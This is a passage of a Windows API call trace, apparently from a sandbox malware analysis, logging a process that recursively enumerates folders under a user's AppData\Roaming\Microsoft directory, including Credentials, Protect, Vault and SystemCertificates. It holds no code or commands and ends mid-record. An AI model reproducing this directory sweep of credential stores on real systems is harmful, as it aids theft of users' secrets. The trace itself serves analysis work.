1 [0266.765] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0266.765] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e898ff, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0266.766] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0266.766] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816a7a21, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0266.766] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0266.766] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0266.766] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMC", cAlternateFileName="")) returned 1 [0266.766] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0266.766] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0266.767] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0266.767] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0266.767] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling", cAlternateFileName="")) returned 1 [0266.767] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0266.767] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0266.767] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0266.768] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0266.768] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0266.768] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee6c | out: lpFindFileData=0x19ee6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0266.768] FindClose (in: hFindFile=0x693090 | out: hFindFile=0x693090) returned 1 [0266.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f4) returned 1 [0266.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f100) returned 1 [0266.768] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x36 [0266.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.768] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x36 [0266.769] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\", lpFilePart=0x0) returned 0x37 [0266.769] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\addins\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.770] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.770] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0266.770] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.770] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\AddIns", lpFilePart=0x0) returned 0x36 [0266.770] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x3c [0266.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.770] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x3c [0266.770] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpFilePart=0x0) returned 0x3d [0266.770] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\bibliography\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6934d0 [0266.771] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.771] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 1 [0266.772] FindNextFileW (in: hFindFile=0x6934d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e9aa3d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e9aa3d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e9aa3d, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 0 [0266.772] FindClose (in: hFindFile=0x6934d0 | out: hFindFile=0x6934d0) returned 1 [0266.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.772] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Bibliography", lpFilePart=0x0) returned 0x3c [0266.772] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x3b [0266.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.772] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x3b [0266.772] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\", lpFilePart=0x0) returned 0x3c [0266.773] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\credentials\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6935d0 [0266.773] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.773] FindNextFileW (in: hFindFile=0x6935d0, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0266.773] FindClose (in: hFindFile=0x6935d0 | out: hFindFile=0x6935d0) returned 1 [0266.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.774] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x3b [0266.774] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpFilePart=0x0) returned 0x48 [0266.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.774] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpFilePart=0x0) returned 0x48 [0266.774] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpFilePart=0x0) returned 0x49 [0266.774] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\document building blocks\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x693090 [0266.776] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0266.776] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0266.776] FindNextFileW (in: hFindFile=0x693090, lpFindFileData=0x19ee5c | out: lpFindFileData=0x19ee5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0266.776] FindClose (in: hFindFile=0x693090 | out: hFindFile=0x693090) returned 1 [0266.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0e4) returned 1 [0266.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f0f0) returned 1 [0266.776] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.", nBufferLength=0x105, lpBuffer=0x19ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpFilePart=0x0) returned 0x48 [0266.777] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel", nBufferLength=0x105, lpBuffer=0x19ec5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel", lpFilePart=0x0) returned 0x35 [0266.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f124) returned 1 [0266.777] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel", nBufferLength=0x105, lpBuffer=0x19ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel", lpFilePart=0x0) returned 0x35 [0266.777] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\", nBufferLength=0x105, lpBuffer=0x19ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\", lpFilePart=0x0) returned 0x36 [0266.777] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\excel\\*"), lpFindFileData=0x19ee4c | out: lpFindFileData=0x19ee4c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x934f7bb4, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 